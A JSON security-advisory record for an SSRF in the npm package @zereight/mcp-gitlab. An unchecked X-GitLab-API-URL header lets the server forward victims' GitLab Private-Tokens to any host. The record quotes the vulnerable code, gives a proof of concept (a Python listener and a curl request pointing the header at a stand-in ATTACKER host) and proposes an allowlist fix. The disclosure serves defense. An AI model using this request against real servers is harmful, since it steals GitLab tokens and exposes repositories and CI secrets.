{"id":"GHSA-2h44-8472-frjj","summary":"@zereight/mcp-gitlab Vulnerable to Server-Side Request Forgery","details":"# Server-Side Request Forgery via X-GitLab-API-URL Header Allows Credential Theft\n\n## Affected\n\n- **Repository:** `zereight/gitlab-mcp`\n- **Affected versions:** All versions through commit `74a8c83`\n- **Patched versions:** None at time of report\n\n## Severity\n\nHigh. CVSS v3.1 8.5 (`AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N`)\n\n## Description\n\nWhen the environment variable `ENABLE_DYNAMIC_API_URL=true` is set, the server\nreads the `X-GitLab-API-URL` HTTP request header and uses it as the base URL for\nall outbound GitLab API calls made within that request. The server validates that\nthe value is a well-formed URL (`new URL(dynamicApiUrl)`) but applies no\nallowlist or hostname restriction. The server then attaches the victim's\n`Private-Token` to every outbound fetch that uses the redirected URL.\n\nAny caller who can reach the HTTP transport can set `X-GitLab-API-URL` to an\nattacker-controlled host. The next GitLab API call the server makes delivers the\nvictim's token to that host.\n\nThe vulnerable code appears at two locations.\n\n**SSE handler (`index.ts:11541`):**\n\n```typescript\nconst dynamicApiUrl = req.headers[\"x-gitlab-api-url\"]?.trim();\nif (ENABLE_DYNAMIC_API_URL && dynamicApiUrl) {\n  apiUrl = normalizeGitLabApiUrl(dynamicApiUrl);   // no allowlist check\n}\n```\n\n**Streamable HTTP handler (`index.ts:11787`), inside `parseAuthHeaders`:**\n\n```typescript\nconst dynamicApiUrl = req.headers[\"x-gitlab-api-url\"]?.trim();\nif (ENABLE_DYNAMIC_API_URL && dynamicApiUrl) {\n  new URL(dynamicApiUrl);                          // syntax-only check\n  apiUrl = normalizeGitLabApiUrl(dynamicApiUrl);   // any reachable host accepted\n}\n```\n\nIn both cases, `apiUrl` propagates through `getEffectiveApiUrl()` and into\n`getFetchConfig()`, which attaches `Private-Token: \u003cvictim_token\u003e` to every\noutbound fetch. The token reaches the attacker's host, not GitLab.\n\n## Proof of Concept\n\nRun upstream `zereight/gitlab-mcp` at commit `74a8c83` with\n`ENABLE_DYNAMIC_API_URL=true` and `REMOTE_AUTHORIZATION=true`.\n\n```bash\n# 1. Start a listener on the attacker host (port 9099)\n#    Any HTTP server that logs incoming headers will work.\npython3 -c \"\nimport http.server, sys\nclass H(http.server.BaseHTTPRequestHandler):\n    def do_GET(self):\n        print('HEADERS:', dict(self.headers))\n        self.send_response(200); self.end_headers()\nhttp.server.HTTPServer(('0.0.0.0', 9099), H).serve_forever()\n\"\n\n# 2. Send any MCP tool call with the malicious header\ncurl -X POST http://TARGET:3002/mcp \\\n  -H \"X-GitLab-API-URL: http://ATTACKER:9099/api/v4\" \\\n  -H \"Authorization: Bearer ANY_VALID_TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"jsonrpc\":\"2.0\",\"method\":\"tools/call\",\"params\":{\"name\":\"list_issues\",\"arguments\":{\"project_id\":\"1\"}},\"id\":1}'\n```\n\nThe listener receives:\n\n```\nGET /api/v4/projects/1/issues HTTP/1.1\nprivate-token: \u003cVICTIM_GITLAB_TOKEN\u003e\nHost: ATTACKER:9099\n```\n\nThe victim's token arrives at the attacker host. The attacker never needed it\nin advance. The MCP server delivered it.\n\n## Impact\n\nThe attacker obtains the victim's GitLab Personal Access Token or CI/CD job\ntoken in a single request. With the stolen token they gain full GitLab API\naccess at the victim's permission level: read of all repositories, issues,\nmerge requests, CI/CD pipeline definitions and variables/secrets; write to push\ncode, modify pipelines, create or delete resources, and rotate CI/CD variables.\n\nCVSS factors:\n- `PR:L`: reaching the HTTP transport requires presenting some auth token\n- `S:C`: the attack crosses the boundary into GitLab (a separate security domain)\n- `C:H`: victim's GitLab token stolen in one request; full read of all scoped data\n- `I:H`: attacker can push code and modify pipelines with the stolen token\n- `A:N`: the MCP server continues operating normally\n\n## Why This Is a Vulnerability, Not Intended Behavior\n\n`ENABLE_DYNAMIC_API_URL` is documented for supporting self-hosted GitLab\ninstances at a non-default base URL. The intended caller behavior is to supply\nthe URL of their own GitLab instance. The feature has no mechanism to distinguish\na legitimate self-hosted GitLab URL from an attacker-controlled host. Once\nenabled, every request that includes `X-GitLab-API-URL` can redirect the server's\ncredential-carrying outbound calls to any reachable host with no restriction.\n\nPR #453 (merged) added a startup guard that blocks the Streamable HTTP transport\nfrom running with static tokens unless `REMOTE_AUTHORIZATION=true` or OAuth is\nconfigured. That guard runs once at server startup and checks transport\nconfiguration. It does not modify `parseAuthHeaders`, does not validate\n`X-GitLab-API-URL`, and does not restrict the token-forwarding path at runtime.\nThe SSRF sink at `index.ts:11787` is unchanged in the current code and fully\nreachable in the documented multi-user deployment mode (`REMOTE_AUTHORIZATION=true`).\n\n## Remediation\n\nValidate `X-GitLab-API-URL` against a configurable allowlist of trusted GitLab\nhostnames before assigning the value to `apiUrl`. Reject any request whose\n`X-GitLab-API-URL` hostname is not in the allowlist. Apply this check at both\n`index.ts:11541` and `index.ts:11787`.\n\nExample fix for the Streamable HTTP handler:\n\n```typescript\nconst ALLOWED_HOSTS = (process.env.GITLAB_ALLOWED_HOSTS ?? \"\")\n  .split(\",\").map(h =\u003e h.trim()).filter(Boolean);\n\nconst dynamicApiUrl = req.headers[\"x-gitlab-api-url\"]?.trim();\nif (ENABLE_DYNAMIC_API_URL && dynamicApiUrl) {\n  const parsed = new URL(dynamicApiUrl);\n  if (!ALLOWED_HOSTS.includes(parsed.hostname)) {\n    throw new Error(`X-GitLab-API-URL hostname not in allowlist: ${parsed.hostname}`);\n  }\n  apiUrl = normalizeGitLabApiUrl(dynamicApiUrl);\n}\n```\n\nDocument `GITLAB_ALLOWED_HOSTS` in the README alongside `ENABLE_DYNAMIC_API_URL`.\nIf maintaining an allowlist is not feasible, disable `ENABLE_DYNAMIC_API_URL` by\ndefault and document the token-forwarding risk prominently.\n\n## Credit\n\nReported via GitHub Security Advisory on 2026-06-07.","aliases":["CVE-2026-61559"],"modified":"2026-09-15T21:15:06.815575919Z","published":"2026-09-15T20:57:28Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-09-15T20:57:28Z","nvd_published_at":null,"cwe_ids":["CWE-918"],"severity":"CRITICAL"},"references":[{"type":"WEB","url":"https://github.com/zereight/gitlab-mcp/security/advisories/GHSA-2h44-8472-frjj"},{"type":"WEB","url":"https://github.com/zereight/gitlab-mcp/pull/625"},{"type":"WEB","url":"https://github.com/zereight/gitlab-mcp/commit/6ffb4cc70706fd05b1ab80901676bc2998b6db6d"},{"type":"PACKAGE","url":"https://github.com/zereight/gitlab-mcp"},{"type":"WEB","url":"https://github.com/zereight/gitlab-mcp/releases/tag/v2.1.27"}],"affected":[{"package":{"name":"@zereight/mcp-gitlab","ecosystem":"npm","purl":"pkg:npm/%40zereight/mcp-gitlab"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0.0.1"},{"fixed":"2.1.27"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-2h44-8472-frjj/GHSA-2h44-8472-frjj.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"}]}